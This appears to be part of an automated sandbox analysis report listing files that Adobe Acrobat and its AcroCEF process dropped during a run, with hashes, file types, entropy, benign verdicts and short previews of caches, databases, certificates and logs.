                                                        SHA1:B17C982E3AB71D415EEA7B1447CD5DC2D6B5FA35
                                                        SHA-256:377D212AC3613EB94B5E35009A553B3B96B20BD13F386719BCC1A3CEC6B01451
                                                        SHA-512:382D375278EA08E1537ABFF97E112FFF4932ACA327599631CC54177B9FD8E2067ACFE1BAD673F327F39FBD67F7A7D21F2090DBEBB8B3D435B566C804D7C380EF
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:2024/11/29-08:29:47.363 17c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/29-08:29:47.365 17c4 Recovering log #3.2024/11/29-08:29:47.365 17c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):334
                                                        Entropy (8bit):5.1523018616447995
                                                        Encrypted:false
                                                        SSDEEP:6:HM8ug3+q2PRN2nKuAl9Ombzo2jMGIFUt8YM8uOmZmw+YM8uoVkwORN2nKuAl9OmT:s8f+vaHAa8uFUt838C/+38rV5JHAa8RJ
                                                        MD5:A8BCD4AF136C4D60E9A6B398CD829B95
                                                        SHA1:4C71958EE405E7CE8635D107C384F5BF75844E71
                                                        SHA-256:9BA8B19DED1ED84AC5AB5A2DCB7BFA7B77DA9240820CAD4533C034507BA6D5B5
                                                        SHA-512:A3631E1442C7D3AD6D81541428E9202C0812A1E8A0B17CAD3D02A9D783F5C83FE42396D8BB95A65FD63F1266ECD4FB09B07933CD7DEFA04DA7B866A880C71B7D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:2024/11/29-08:29:47.117 1adc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/29-08:29:47.121 1adc Recovering log #3.2024/11/29-08:29:47.122 1adc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):334
                                                        Entropy (8bit):5.1523018616447995
                                                        Encrypted:false
                                                        SSDEEP:6:HM8ug3+q2PRN2nKuAl9Ombzo2jMGIFUt8YM8uOmZmw+YM8uoVkwORN2nKuAl9OmT:s8f+vaHAa8uFUt838C/+38rV5JHAa8RJ
                                                        MD5:A8BCD4AF136C4D60E9A6B398CD829B95
                                                        SHA1:4C71958EE405E7CE8635D107C384F5BF75844E71
                                                        SHA-256:9BA8B19DED1ED84AC5AB5A2DCB7BFA7B77DA9240820CAD4533C034507BA6D5B5
                                                        SHA-512:A3631E1442C7D3AD6D81541428E9202C0812A1E8A0B17CAD3D02A9D783F5C83FE42396D8BB95A65FD63F1266ECD4FB09B07933CD7DEFA04DA7B866A880C71B7D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:2024/11/29-08:29:47.117 1adc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/29-08:29:47.121 1adc Recovering log #3.2024/11/29-08:29:47.122 1adc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4099
                                                        Entropy (8bit):5.2335572055314525
                                                        Encrypted:false
                                                        SSDEEP:96:OLSw0bSwIAnrRqLX2rSq1OUxu/0OZ0xRBTxekN8xetos7f:OLT0bTIeYa51Ogu/0OZARBT8kN88us7f
                                                        MD5:711753CF28F250DB7DD6014B88A056B5
                                                        SHA1:C649C4CDFE0472548EAF7B945854EF70E49FC016
                                                        SHA-256:FF410A8CA310DBC5FC45189C0521390064EE30B78329A3AAF8892EACD8E21A72
                                                        SHA-512:042567F28085410E7F0A2EFA21CDBC00978BF27CC60D72D1DE971C5FEC474F4A3C7BDFE706F7DDD89D6645C2F63CBD6D1E6ED4B2A5377D538FC11CD5669D847D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):322
                                                        Entropy (8bit):5.199649496020985
                                                        Encrypted:false
                                                        SSDEEP:6:HM8uZG+q2PRN2nKuAl9OmbzNMxIFUt8YM8unXZmw+YM8uxVkwORN2nKuAl9OmbzE:s8n+vaHAa8jFUt838U/+38mV5JHAa84J
                                                        MD5:3F681FA436E0052E0029D70B7A7A4398
                                                        SHA1:5CF04D67CC9DEA83D3FDD1DC41A89ED75D03848F
                                                        SHA-256:6975A40AE5BF198B51C3B97D066F026D402BB5C5046CFBDE53394429BB4767FA
                                                        SHA-512:12CD2C906C205A87E3CAFBDCD01DF73F45C7FB0C764BEC9A2D969A046CF9C2A5EE82C81E344DBD7218E03E992720383762BBD4A5E440A5A66F44F9963A006393
                                                        Malicious:false
                                                        Preview:2024/11/29-08:29:47.416 1adc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/29-08:29:47.417 1adc Recovering log #3.2024/11/29-08:29:47.419 1adc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):322
                                                        Entropy (8bit):5.199649496020985
                                                        Encrypted:false
                                                        SSDEEP:6:HM8uZG+q2PRN2nKuAl9OmbzNMxIFUt8YM8unXZmw+YM8uxVkwORN2nKuAl9OmbzE:s8n+vaHAa8jFUt838U/+38mV5JHAa84J
                                                        MD5:3F681FA436E0052E0029D70B7A7A4398
                                                        SHA1:5CF04D67CC9DEA83D3FDD1DC41A89ED75D03848F
                                                        SHA-256:6975A40AE5BF198B51C3B97D066F026D402BB5C5046CFBDE53394429BB4767FA
                                                        SHA-512:12CD2C906C205A87E3CAFBDCD01DF73F45C7FB0C764BEC9A2D969A046CF9C2A5EE82C81E344DBD7218E03E992720383762BBD4A5E440A5A66F44F9963A006393
                                                        Malicious:false
                                                        Preview:2024/11/29-08:29:47.416 1adc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/29-08:29:47.417 1adc Recovering log #3.2024/11/29-08:29:47.419 1adc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                        Category:dropped
                                                        Size (bytes):65110
                                                        Entropy (8bit):1.0243563825141428
                                                        Encrypted:false
                                                        SSDEEP:96:lDyQVlmGKgCEy5ZaNIaq10ksUMQkTBfhCzAvHlxzU50yLa4da/I8FQc:9yqlmDvLe2sUMQkT/1vFPyi/h3
                                                        MD5:78A86AF574ABAC9B4EC5A147E36E9A2B
                                                        SHA1:018E76C2516E442EFC7941902373BA2DED185959
                                                        SHA-256:F6665424463509F69EC6DA98E675D3E0CA883A2BF539A4F46434AEBC8717B01C
                                                        SHA-512:82C00F47225B32337119CB6843452D4E13CD3D164D7816BD668922771AFF91F8A59FBADCB1BD18C372AE733187C20E09B4A47EDBEC0E2F618E54C82077EF5981
                                                        Malicious:false
                                                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):57344
                                                        Entropy (8bit):3.291927920232006
                                                        Encrypted:false
                                                        SSDEEP:192:vedRBvVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:veBci5H5FY+EUUUTTcHqFzqFP
                                                        MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                        SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                        SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                        SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite Rollback Journal
                                                        Category:dropped
                                                        Size (bytes):16928
                                                        Entropy (8bit):1.2147886399944607
                                                        Encrypted:false
                                                        SSDEEP:24:7+tnIJRqLi+zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzmp:7MnsRqLmFTIF3XmHjBoGGR+jMz+LhwUn
                                                        MD5:7EB376D0FC7EC710B86C3C157434E8F1
                                                        SHA1:F9A67C88FCD0879C25A16EF5845A6395B645A322
                                                        SHA-256:A66B7E201DAB30F03EE320758EF46FFA58C37E4CE9AF2205057BEB5640D20637
                                                        SHA-512:54A8FBAE5CA6970E8ABDEF721A5086C59C5DAB59D6EC1E6A6401774661151D01747B7DAC7225AC4E7E13CB8AB3067EA10D328F0C4A18372ABDA3B65F5FC7659A
                                                        Malicious:false
                                                        Preview:.... .c......C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:Certificate, Version=3
                                                        Category:dropped
                                                        Size (bytes):1391
                                                        Entropy (8bit):7.705940075877404
                                                        Encrypted:false
                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                        Malicious:false
                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                        Category:dropped
                                                        Size (bytes):71954
                                                        Entropy (8bit):7.996617769952133
                                                        Encrypted:true
                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                        Malicious:false
                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):192
                                                        Entropy (8bit):2.7457468364538267
                                                        Encrypted:false
                                                        SSDEEP:3:kkFklY9pvfllXlE/HT8kkLzttNNX8RolJuRdxLlGB9lQRYwpDdt:kKB9pQT8tVNMa8RdWBwRd
                                                        MD5:3CF49F414EFE2D7065A301CE86D20923
                                                        SHA1:8F086CCF0E5AEE8EB1D0061CC51BC2115F8C4331
                                                        SHA-256:52373B9BEA249705434352914D56839F831BFEEAC5B4868FE939B2BB5D404454
                                                        SHA-512:46064B9B954A699500EC05BEB898B3FF107625E8D460DD6226D05B2ED2EA57B6049205E9B343474B899CA3B18C91339CA793D396868E2D75CAA71542399F6FD7
                                                        Malicious:false
                                                        Preview:p...... ........k..bB..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):328
                                                        Entropy (8bit):3.1402905242023693
                                                        Encrypted:false
                                                        SSDEEP:6:kKNV4ei9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:/FDnLNkPlE99SNxAhUe/3
                                                        MD5:BEA999BE837C6606E2B8F517097A5579
                                                        SHA1:8DF661BC5521260F95D45FF829D0B2F8FD9A1EB1
                                                        SHA-256:88076E55690C778568FFF432BEF944CC1CD4F50CC7F7297737AF7126C7B59AE3
                                                        SHA-512:3DFC100B523BED10967B03C54F33C9042BD0FBE376B73ABF547820386211889ABE3D40B0F375CEC15053D5A8EC4C1F84B481EEE1A42681D67414A2006D8391E4
                                                        Malicious:false
                                                        Preview:p...... ............bB..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4
                                                        Entropy (8bit):0.8112781244591328
                                                        Encrypted:false
                                                        SSDEEP:3:e:e
                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                        Malicious:false
                                                        Preview:....
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2145
                                                        Entropy (8bit):5.082230231879543
                                                        Encrypted:false
                                                        SSDEEP:48:YcAiESAuYCjWbj2CjxjZ4oijxi+0jPjrVbjBgajF:FDWP2ERaTx3y7BPBgMF
                                                        MD5:2157FA2EB7AF9F5F6E9E05A03AD52D25
                                                        SHA1:BE35DDF8185D3ECF4CF1FCB9905A8C1662A2A14A
                                                        SHA-256:79CFA0DFD73D64414B8653FEF4F04F25BABFD6AAB15C713DCC5C09155DA587E7
                                                        SHA-512:740D76F3FBD64B8FA6FCC5018F01F1F00BCD26DF987EB5F1391AFB8AC38448F9D20C76C48738BC61F2C0AD94BF418613FB2B3D32CF858D9138CBFDDE4C7CD77A
                                                        Malicious:false
                                                        Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1732886989000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"f44756c6e08822e64c0e471a2499e34d","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696585148000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e8f53b6740aba22a83a1a569cebedbcc","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696585148000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"cc1faa6a0c714f2f0c497731f1772fa2","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696585143000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"ab062dea95f25ef019cc2f5f5f0121d4","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696583346000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"65580efad4bc88b91040ff50d71bfae9","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696583346000},{"id":"DC_Reader_Edit_LHP_Banner"
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                        Category:dropped
                                                        Size (bytes):12288
                                                        Entropy (8bit):0.9884923009526959
                                                        Encrypted:false
                                                        SSDEEP:24:TLHRx/XYKQvGJF7urs67Y9QmQ6QekRZVX0IcLESiAie7ZVX0F:TVl2GL7ms67YXtrkRHbcI8fHI
                                                        MD5:07CEA46EEB78630E4F5A47D5E6AD204B
                                                        SHA1:E99BC8CEDDB63B6ABCDE15B563415A021399753B
                                                        SHA-256:8132CBA254FA2E927B748C6FE2C86964BB52F7CAED47A4629B9A89AC02D3CFD5
                                                        SHA-512:3C29DB71BB0C4F50ACEA46EC3647DD7BDDB3AAFC406C991EC9F760A46F7556D259DFB2AE41E849344E7B6E901AC7EC2AE62B6F2612038D74BCF20B612D0E51B2
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite Rollback Journal
                                                        Category:dropped
                                                        Size (bytes):8720
                                                        Entropy (8bit):1.3440752634618827
                                                        Encrypted:false
                                                        SSDEEP:24:7+tyASY9QmQ6QekRZVX07cLESiAi0mY9Q8qLBx/XYKQvGJF7urs0:7MylYXtrkRHocI8KYBqll2GL7ms0
                                                        MD5:D2CA5380A003F2D24134AEEF5133995F
                                                        SHA1:70B16C82855CF49ABEA64E5F4C0B4830D09BCF2A
                                                        SHA-256:DAD20649925A52133759B5B290FA376E5FB0BB8B16BF29641C4AAD40F7F30CBC
                                                        SHA-512:731DBD8C572F67867B9A3EFB1F701441B026DC11BFC8DD7724D69BDF52E14C9EC479F6B4D216BF90B7FB8368CDD4542FE7CF611464406B6A10B60D42513C18EC
                                                        Malicious:false
                                                        Preview:.... .c......f........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):66726
                                                        Entropy (8bit):5.392739213842091
                                                        Encrypted:false
                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgg4dJNUIdBVYEfaihTK4SJbxj+IXqYyu:6a6TZ44ADE6IHKEfai8vJh+zK
                                                        MD5:C999D6A3A62CBCBF5D5B11BB64615AE3
                                                        SHA1:1C34E2F0B3BA64D4CE9B8C0FF35F7822CCF2604B
                                                        SHA-256:3867FBAA7D201E4C9000EBFF46B367DAE1EB63682AB40A60AC1C43BA0A9D6670
                                                        SHA-512:C66197F6909DAC5E9A176DF18FC9E48A50992496CFA2C377363C2147B662FB8DD88D1FDEFD658DF5AA50346BC7B02C02CE1167A11B697DF77F5F855A47F5FEB2
                                                        Malicious:false
                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):246
                                                        Entropy (8bit):3.5274671434738973
                                                        Encrypted:false
                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8xOl8Xk9:Qw946cPbiOxDlbYnuRK599
                                                        MD5:B4FF257C6E44D1BA1AD818B0C0312F18
                                                        SHA1:E313C55953B9DFB14AE39E03052DC7DBE6DC14D9
                                                        SHA-256:510C912ABAAF3F750DD6AEFBF1455C06803C420CBC2800FEECB0C90BF3933A07
                                                        SHA-512:B01D592EEE18057408BF5EE0CC5B7B796A5AF123A297C25DD7BCC57B3DB0B84B5D532A69507CD9E328CD850F5D7290A2B73AB313CC2F64228D99F2B9764C30EE
                                                        Malicious:false
                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.9./.1.1./.2.0.2.4. . .0.8.:.2.9.:.5.4. .=.=.=.....
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with very long lines (393)
                                                        Category:dropped
                                                        Size (bytes):16525
                                                        Entropy (8bit):5.353642815103214
                                                        Encrypted:false
                                                        SSDEEP:384:tbxtsuP+XEWJJQbnR8L31M7HeltV+KYm3wsa2KjF4ODkr/O8r2IUHUHMWwEyZRN2:aPL
                                                        MD5:91F06491552FC977E9E8AF47786EE7C1
                                                        SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                        SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                        SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                        Malicious:false
                                                        Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):15114
                                                        Entropy (8bit):5.368201388153804
                                                        Encrypted:false
                                                        SSDEEP:384:IEoB44EceAnnmk+1S/+7d6XPoPs2Q5ZT4bHZjLozqTOADeTY6i4CAdA5cXdNEHfb:WMl
                                                        MD5:F5A8F6492E910A47973999F569C25F58
                                                        SHA1:DAE188FF774DAD3BF26FCCDCDB0A51F28BD0E652
                                                        SHA-256:7C96C878F28404EC291F4E872A6F795832DDCE79BC96B485E1FCCFCDDB750064
                                                        SHA-512:387166F8F1C27980568F666368351C84110CE85A9D1FD80AAE00734B2CCE41C762E5278BD84A9F4D0C371C6A649948FCD1AD7AA169EF749A3A59D1555612BB6F
                                                        Malicious:false
